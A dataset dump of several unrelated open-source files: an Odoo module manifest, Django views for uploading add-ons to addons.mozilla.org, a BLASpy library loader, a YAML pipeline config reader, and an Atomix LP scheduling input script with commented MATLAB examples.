repo_name (stringlengths 5–92) | path (stringlengths 4–232) | copies (stringclasses, 19 values) | size (stringlengths 4–7) | content (stringlengths 721–1.04M) | license (stringclasses, 15 values) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51–99.9) | line_max (int64, 15–997) | alpha_frac (float64, 0.25–0.97) | autogenerated (bool, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|
acsone/mozaik | mozaik_account/__openerp__.py | 1 | 1753 | # -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of mozaik_account, an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# mozaik_account is free software:
# you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# mozaik_account is distributed in the hope that it will
# be useful but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the
# GNU Affero General Public License
# along with mozaik_account.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'MOZAIK: Account',
'version': '1.0.1',
"author": "ACSONE SA/NV",
"maintainer": "ACSONE SA/NV",
"website": "http://www.acsone.eu",
'category': 'Political Association',
'depends': [
'account_accountant',
'account_cancel',
'account_auto_installer',
'mozaik_mandate',
],
'description': """
MOZAIK Account
==============
Manage accounting features
""",
'images': [
],
'data': [
'security/account_security.xml',
'account_view.xml',
],
'qweb': [
],
'demo': [
],
'test': [
],
'license': 'AGPL-3',
'sequence': 150,
'installable': True,
'auto_install': False,
'application': False,
}
| agpl-3.0 | 5,313,263,469,645,565,000 | 28.216667 | 78 | 0.547633 | false |
mozilla/FlightDeck | apps/amo/views.py | 1 | 5070 | import commonware.log
import simplejson
from django.shortcuts import get_object_or_404 # render_to_response,
from django.http import HttpResponse, HttpResponseBadRequest
from amo import tasks
from amo.constants import STATUS_UPLOAD_FAILED, STATUS_UPLOAD_SCHEDULED
from amo.helpers import get_addon_details as _get_addon_details
from jetpack.models import PackageRevision
#from utils.exceptions import SimpleException
log = commonware.log.getLogger('f.amo')
def upload_to_amo(request, pk):
"""Upload a XPI to AMO
"""
    # check whether this Add-on was already uploaded with the same version name
revision = get_object_or_404(PackageRevision, pk=pk)
version = revision.get_version_name()
uploaded = PackageRevision.objects.filter(
package=revision.package).filter(
amo_version_name=version).exclude(
amo_status=None).exclude(
amo_status=STATUS_UPLOAD_FAILED).exclude(
amo_status=STATUS_UPLOAD_SCHEDULED)
if len(uploaded) > 0:
log.debug("This Add-on was already uploaded using version \"%s\"" % version)
log.debug(revision.amo_status)
return HttpResponseBadRequest("This Add-on was already uploaded using version \"%s\"" % version)
try:
PackageRevision.objects.get(
package=revision.package, amo_version_name=version,
amo_status=STATUS_UPLOAD_SCHEDULED)
except PackageRevision.DoesNotExist:
pass
else:
log.debug("This Add-on is currently scheduled to upload")
return HttpResponseBadRequest("This Add-on is currently scheduled to upload")
log.debug('AMOOAUTH: Scheduling upload to AMO')
tasks.upload_to_amo.delay(pk)
return HttpResponse('{"delayed": true}')
def get_addon_details_from_amo(request, pk):
""" Finds latest revision uploaded to AMO and pulls metadata from AMO
using `generic AMO API <https://developer.mozilla.org/en/addons.mozilla.org_%28AMO%29_API_Developers%27_Guide/The_generic_AMO_API>`_
:attr: pk (int) :class:`~jetpack.models.PackageRevision` primary key
:returns: add-on metadata or empty dict in JSON format
"""
# get PackageRevision
revision = get_object_or_404(PackageRevision, pk=pk)
# check if Package is synced with the AMO and last update was successful
if (not revision.package.amo_id
or revision.amo_status == STATUS_UPLOAD_FAILED):
return HttpResponse('{}')# mimetype="application/json")
# pull info
amo_meta = _get_addon_details(revision.package.amo_id,
revision.amo_file_id)
if 'deleted' in amo_meta:
# remove info about the amo_addon from Package
revision.package.amo_id = None
revision.package.amo_slug = None
revision.package.latest_uploaded = None
revision.package.save()
# remove info about uploads from revisions
revisions = revision.package.revisions.all()
for r in revisions:
r.amo_status = None
r.amo_version_name = None
r.amo_file_id = None
super(PackageRevision, r).save()
return HttpResponse(simplejson.dumps(amo_meta))
# update amo package data
amo_slug = amo_meta.get('slug', None)
if (amo_slug and
(not revision.package.amo_slug
or revision.package.amo_slug != amo_slug)):
revision.package.amo_slug = amo_slug
revision.package.save()
if amo_slug:
amo_meta['view_on_amo_url'] = revision.package.get_view_on_amo_url()
amo_meta['edit_on_amo_url'] = revision.package.get_edit_on_amo_url()
# update amo revision data
if ('version' in amo_meta
and amo_meta['version'] == revision.amo_version_name):
revision.amo_status = int(amo_meta['status_code'])
super(PackageRevision, revision).save()
return HttpResponse(simplejson.dumps(amo_meta),
mimetype="application/json")
def get_addon_details(request, pk):
"""Provide currently stored AMO Status (without contacting to AMO)
:attr: pk (int) :class:`~jetpack.models.PackageRevision` primary key
:returns: add-on metadata or empty dict in JSON format
"""
# get PackageRevision
revision = get_object_or_404(PackageRevision, pk=pk)
# check if Package was scheduled for upload
if revision.amo_status == None:
return HttpResponse('{}', mimetype="application/json")
amo_meta = {'status': revision.get_status_name(),
'status_code': revision.amo_status,
'version': revision.amo_version_name,
'get_addon_info_url': revision.get_status_url(),
'pk': revision.pk,
'uploaded': revision.amo_status != STATUS_UPLOAD_FAILED}
if revision.package.amo_slug:
amo_meta['view_on_amo_url'] = revision.package.get_view_on_amo_url()
amo_meta['edit_on_amo_url'] = revision.package.get_edit_on_amo_url()
return HttpResponse(simplejson.dumps(amo_meta),
mimetype="application/json")
| bsd-3-clause | -3,445,110,804,472,861,000 | 39.56 | 136 | 0.657791 | false |
nicholas-moreles/blaspy | blaspy/config.py | 1 | 1951 | """
Copyright (c) 2014-2015-2015, The University of Texas at Austin.
All rights reserved.
This file is part of BLASpy and is available under the 3-Clause
BSD License, which can be found in the LICENSE file at the top-level
directory or at http://opensource.org/licenses/BSD-3-Clause
"""
from .errors import raise_blas_os_error
from ctypes import cdll
from os import chdir, path
from platform import system
from struct import calcsize
# The name of the BLAS .so or .dll file. By default this is the OpenBLAS reference
# implementation bundled with BLASpy. Only modify if you wish to use a different version of BLAS
# or if your operating system is not supported by BLASpy out of the box.
BLAS_NAME = "" # default is ""
# True if the BLAS .so or .dll file is in the blaspy/lib subdirectory,
# False if Python should search for it.
IN_BLASPY_SUBDIRECTORY = True # default is True
###############################
# DO NOT EDIT BELOW THIS LINE #
###############################
# find the appropriate BLAS to use
if BLAS_NAME == "": # try to use included OpenBLAS
PREPEND = str(path.dirname(__file__))[:-6] + "lib/"
if system() == "Windows":
if calcsize("P") == 8: # 64-bit
BLAS_NAME = "libopenblas-0.2.13-win64-int32.dll"
chdir(PREPEND + "win64")
else: # 32-bit
BLAS_NAME = "libopenblas-0.2.13-win32.dll"
chdir(PREPEND + "win32")
PREPEND = ""
elif system() == "Linux":
if calcsize("P") == 8: # 64-bit
BLAS_NAME = "libopenblas-0.2.13-linux64.so"
PREPEND += "linux64/"
else: # 32-bit
BLAS_NAME = "libopenblas-0.2.13-linux32.so"
PREPEND += "linux32/"
else: # no appropriate OpenBLAS included, BLAS_NAME_OVERRIDE must be used
raise_blas_os_error()
else:
PREPEND = ""
# Change the directory and load the library
_libblas = cdll.LoadLibrary(PREPEND + BLAS_NAME) | bsd-3-clause | -4,852,845,395,253,406,000 | 34.490909 | 96 | 0.627883 | false |
khalidm/vcf_annotation_pipeline | src/config.py | 1 | 3349 | '''
Configuration file reading and access functions.
The configuration file is written in YAML and is supplied
by the user.
TODO: validation of config file input.
'''
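# A minimal usage sketch (the file name, stage name, and option name below are
# hypothetical illustrations, not part of this module):
#   config = Config('pipeline_config.yaml')
#   config.validate()
#   cores = config.get_stage_option('align', 'cores')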
import yaml
class Config(object):
def __init__(self, config_filename):
# Try to open and parse the YAML formatted config file
with open(config_filename) as config_file:
try:
config = yaml.load(config_file)
except yaml.YAMLError, exc:
print("Error in configuration file:", exc)
raise exc
self.config = config
self.config_filename = config_filename
def get_options(self, *options):
num_options = len(options)
if num_options == 1:
return self.get_option(options[0])
else:
return (self.get_option(o) for o in options)
def get_option(self, option):
'''Retrieve a global option from the configuration'''
if option in self.config:
return self.config[option]
else:
raise Exception("Unknown option: {}, not in configuration " \
"file: {}".format(option, self.config_filename))
def get_stage_options(self, stage, *options):
num_options = len(options)
if num_options == 1:
return self.get_stage_option(stage, options[0])
else:
return (self.get_stage_option(stage, o) for o in options)
def get_stage_option(self, stage, option):
'''Try to retrieve a configuration option for a particular stage.
If the stage does not define the option then look for it in the
default options.
'''
stages = self.config['stages']
if stage in stages:
this_stage = stages[stage]
# Look for the option in the specified stage
if option in this_stage:
return this_stage[option]
else:
# Look for the option in the defaults
defaults = self.config['defaults']
if option in defaults:
return defaults[option]
else:
# Option does not have a default value
raise Exception("Option: {} not defined in config for " \
"stage: {} nor in defaults in configuration " \
"file {}".format(option, stage, self.config_filename))
else:
# Stage does not exist in the config file
raise Exception("Unknown stage: {}, not in configuration " \
"file: {}".format(stage, self.config_filename))
def validate(self):
'''Check that the configuration is valid.'''
config = self.config
filename = self.config_filename
# Test for required fields: defaults, stages, fastqs, pipeline_id
check_required_field(config, filename, 'defaults')
check_required_field(config, filename, 'stages')
check_required_field(config, filename, 'vcf')
check_required_field(config, filename, 'pipeline_id')
def check_required_field(config, filename, field):
'''Utility to check whether a field exists in the config dictionary'''
if field not in config:
raise Exception("Configuration file {} does not have '{}' " \
"field".format(filename, field))
| bsd-3-clause | 1,210,728,800,399,517,700 | 36.629213 | 78 | 0.587041 | false |
manub686/atomix | r1cmplr/lpinput.py | 1 | 19222 | #!/usr/bin/env python
'''
Atomix project, lpinput.py, (TODO: summary)
Copyright (c) 2015 Stanford University
Released under the Apache License v2.0. See the LICENSE file for details.
Author(s): Manu Bansal
'''
import numpy as np
import sys
def main():
inpfile = sys.argv[1]
(inp, out) = lpinput(inpfile)
print inp
print out
def lpinput(inpfile):
#[inp, opt] = example();
#[inp, opt] = example1();
#[inp, opt] = example2();
#[inp, opt] = wifi_6mbps_steady_state();
#[inp, opt] = wifi_54mbps_steady_state();
(inp, opt) = new_flowgraphs(inpfile);
return (inp, opt)
def new_flowgraphs(inpfile):
opt = {}
inp = {}
#problem = 'wifi_54mbps_split';
#opt["lpoutfile"] = problem + '.lp';
opt["minimize_makespan"] = 1;
opt["constraints_no_overbook"] = 1;
opt["constraints_communication_allowance"] = 1;
opt["extra_information_zero_y_i_j"] = 0;
opt["relaxation_x_not_integer"] = 1;
opt["constant_scale_down_factor"] = 1;
# d = 12000; #deadline
D = 100000000; #"infinity" equivalent in expressing the ILP
#run(['wifi_schedule_data/' problem '.m']);
modname = inpfile.split('.py')[0]
print modname
mod = __import__(modname)
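  # The problem module is expected to return: p, an n-jobs x m-processors matrix of
  # compute times; G, the precedence edges between jobs; q, the inter-processor
  # transfer-cost matrix; dl, the deadline; and T, a timing parameter stored in inp["T"].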
(p,G,q, dl,T) = mod.model(D)
print("DEADLINE = %d"%dl)
d = dl ## State Deadline
#n = size(p, 1);
#m = size(p, 2);
n = p.shape[0]; #number of jobs to schedule
m = p.shape[1]; #number of processors
print n, m
#raw_input()
  # Communication costs between different processors (for some fixed transfer size): {qij}, 1 ≤ i ≤ m, 1 ≤ j ≤ m
#cpu2viterbi = 100;
#cpu2cpu = 1000;
# FIFO transfer time on same processor
#singular_fifo_transfer_time = 200;
#q = D*np.ones((m,m), dtype=np.int);
#for ii in range(4):
# for jj in range(4):
# if ii == jj:
# q[ii][jj] = singular_fifo_transfer_time;
# else:
# q[ii][jj] = cpu2cpu;
#for ii in range(4):
#for jj in range(3,9):
# for jj in range(4,8):
# q[ii][jj] = cpu2viterbi;
# q[jj][ii] = cpu2viterbi;
print
print "q matrix:"
print q
inp["n"] = n;
inp["d"] = d;
inp["D"] = D;
inp["G"] = G;
inp["m"] = m;
inp["p"] = p;
inp["q"] = q;
inp["T"] = T
return (inp, opt)
#function [inp, opt] = example1()
# opt["lpoutfile"] = 'example1.lp'
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# %n = 13; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8; 8,9; 9,10; 10,11; 11,12; 12,13];
# n = 4; d = 20000; G = [ 1,2; 2,3; 3,4];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9 %3 dsps, 4 vcps, 2 fcps
#
#  % Compute times of jobs on processors: {pij}, 1 ≤ i ≤ n, 1 ≤ j ≤ m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# ]
#
#  % Communication costs between different processors (for some fixed transfer size): {qij}, 1 ≤ i ≤ m, 1 ≤ j ≤ m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ]
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#
#function [inp, opt] = example2()
# opt["lpoutfile"] = 'example2.lp'
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# %n = 13; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8; 8,9; 9,10; 10,11; 11,12; 12,13];
# n = 8; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8];
# %n = 7; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9 %3 dsps, 4 vcps, 2 fcps
#
#  % Compute times of jobs on processors: {pij}, 1 ≤ i ≤ n, 1 ≤ j ≤ m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ]
#
#  % Communication costs between different processors (for some fixed transfer size): {qij}, 1 ≤ i ≤ m, 1 ≤ j ≤ m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ]
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#
#
#% 1 kFunctionUids_PacketSearch_PutUnalignedGetAligned,
#% 2 kFunctionUids_CfoCorrectorWifi_ApplyGainAndCorrectCfo,
#% 3 kFunctionUids_OfdmDemodulator64pCp16_demodulate,
#% 4 kFunctionUids_OfdmEqualizer_Equalize,
#%
#% 5 kFunctionUids_SoftDemapper_BpskFromYhstar,
#% 6 kFunctionUids_DeinterleaverLutWifi_Deinterleave,
#% 7 kFunctionUids_ViterbiBranchMetrics_calculate,
#% 8 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#%
#% 9 <mid decode happens on the VCP>
#%
#% 10 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 11 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 12 kFunctionUids_DescramblerWifi_Descramble,
#% 13 kFunctionUids_Crc32Wifi_UpdateCrc32
#
#% G: 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 8 -> 9 -> 10 -> 11 -> 12 -> 13
#% As expressed by the user, the graph has total dependency for a single iteration. The scheduler
#% must come up with a pipelined schedule to meet throughput requirements.
#%
#% Compute times on cpu/vcp:
#% 1: 200, 2: 400, 3: 200, 4: 600,
#% 5: 200, 6: 200, 7: 200, 8: 100,
#% 9: 4000 (vcp), D (cpu)
#% 10: 100, 11: 200, 12: 100, 13: 100
#
#function [inp, opt] = wifi_6mbps_steady_state()
# opt["lpoutfile"] = 'wifi_6mbps_steady_state.lp';
# opt["minimize_makespan"] = 0;
# %opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# n = 13; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8; 8,9; 9,10; 10,11; 11,12; 12,13];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9; %3 dsps, 4 vcps, 2 fcps
#
#  % Compute times of jobs on processors: {pij}, 1 ≤ i ≤ n, 1 ≤ j ≤ m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# ...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#  % Communication costs between different processors (for some fixed transfer size): {qij}, 1 ≤ i ≤ m, 1 ≤ j ≤ m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#function [inp, opt] = wifi_9mbps_steady_state()
#
#end
#
#function [inp, opt] = example()
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# opt["constant_scale_down_factor"] = 1;
# %opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% d = 4800
#% D = 5000
#
#% d = 9600
#% D = 10000
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
#% n = 10 %number of jobs in the compute graph G
#%
#%
#%
#% G = [...
#% 1, 2;...
#% 2, 3;...
#% 3, 4;...
#% ...
#% 4, 5;...
#% 5, 6;...
#% ...
#% 4, 7;...
#% 7, 8;...
#% 8, 9;...
#% ...
#% 6, 10;...
#% 9, 10;...
#% ]
#
#
# %n = 10; d = 12000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8; 8,9; 6,10; 9,10;]
# %n = 9; d = 9000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8; 8,9; 6,9; ]
# n = 9; d = 20000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8; 8,9; 6,9; ]
# %n = 8; d = 4800; G = [1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8;]
# %n = 5; d = 2400; G = [ 1,2; 2,3; 3,4; 4,5; ]
#
# %G = randomDirectedGraph(n)
#
# D = d + 100;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9; %3 dsps, 4 vcps, 2 fcps
#
#  % Compute times of jobs on processors: {pij}, 1 ≤ i ≤ n, 1 ≤ j ≤ m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, 200, 200;...
# ...
# 500, 500, 500, D, D, D, D, D, D;...
# 8000, 8000, 8000, 4000, 4000, 4000, 4000, D, D;...
# ...
# 500, 500, 500, D, D, D, D, D, D;...
# 300, 300, 300, D, D, D, D, D, D;...
# 8000, 8000, 8000, 4000, 4000, 4000, 4000, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#  % Communication costs between different processors (for some fixed transfer size): {qij}, 1 ≤ i ≤ m, 1 ≤ j ≤ m
#% q = [...
#% 0, 100, 100, 50, 50, 50, 50, 50, 50;...
#% 100, 0, 100, 50, 50, 50, 50, 50, 50;...
#% 100, 100 0, 50, 50, 50, 50, 50, 50;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% ]
#
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#
#% 1 kFunctionUids_PacketSearch_PutUnalignedGetAligned,
#% 2 kFunctionUids_CfoCorrectorWifi_ApplyGainAndCorrectCfo,
#% 3 kFunctionUids_OfdmDemodulator64pCp16_demodulate,
#% 4 kFunctionUids_OfdmEqualizer_Equalize,
#%
#% 5 kFunctionUids_SoftDemapper_64qamTable,
#% 6 kFunctionUids_DeinterleaverLutWifi_Deinterleave,
#% 7 kFunctionUids_ViterbiBranchMetrics_calculate,
#%
#% 8 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#% 9 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#% 10 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#% 11 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#%
#% 12 <mid decode happens on the VCP>
#% 13 <mid decode happens on the VCP>
#% 14 <mid decode happens on the VCP>
#% 15 <mid decode happens on the VCP>
#%
#% 16 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 17 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 18 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 19 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#
#% 20 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 21 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 22 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 23 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#
#% 24 kFunctionUids_DescramblerWifi_Descramble,
#% 25 kFunctionUids_Crc32Wifi_UpdateCrc32
#
#% G: 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7
#% 7 -> 8 -> 12 -> 16 -> 20
#% 7 -> 9 -> 13 -> 17 -> 21
#% 7 -> 10 -> 14 -> 18 -> 22
#% 7 -> 11 -> 15 -> 19 -> 23
#% 20 -> 24
#% 21 -> 24
#% 22 -> 24
#% 23 -> 24
#% 24 -> 25
#
#% As expressed by the user, the graph has total dependency for a single iteration. The scheduler
#% must come up with a pipelined schedule to meet throughput requirements.
#%
#% Compute times on cpu/vcp:
#% 1: 200, 2: 400, 3: 200, 4: 600,
#% 5: 200, 6: 200, 7: 200, 8: 100, 9: 100, 10:100, 11:100
#% 12, 13, 14, 15: 4000 (vcp), D (cpu)
#% 16, 17, 18, 19: 100
#% 20, 21, 22, 23: 200
#% 24: 100, 25: 100
#
#
#function [inp, opt] = wifi_54mbps_steady_state()
# opt["lpoutfile"] = 'wifi_54mbps_steady_state.lp';
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# %n = 25; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# %n = 25; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# %n = 25; d = 15000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# n = 25; d = 20000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# 7,8; 8,12; 12,16; 16,20;...
# 7,9; 9,13; 13,17; 17,21;...
# 7,10; 10,14; 14,18; 18,22;...
# 7,11; 11,15; 15,19; 19,23;...
# 20,24;...
# 21,24;...
# 22,24;...
# 23,24;...
# 24,25;...
# ];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9; %3 dsps, 4 vcps, 2 fcps
#
#  % Compute times of jobs on processors: {pij}, 1 ≤ i ≤ n, 1 ≤ j ≤ m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# ...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
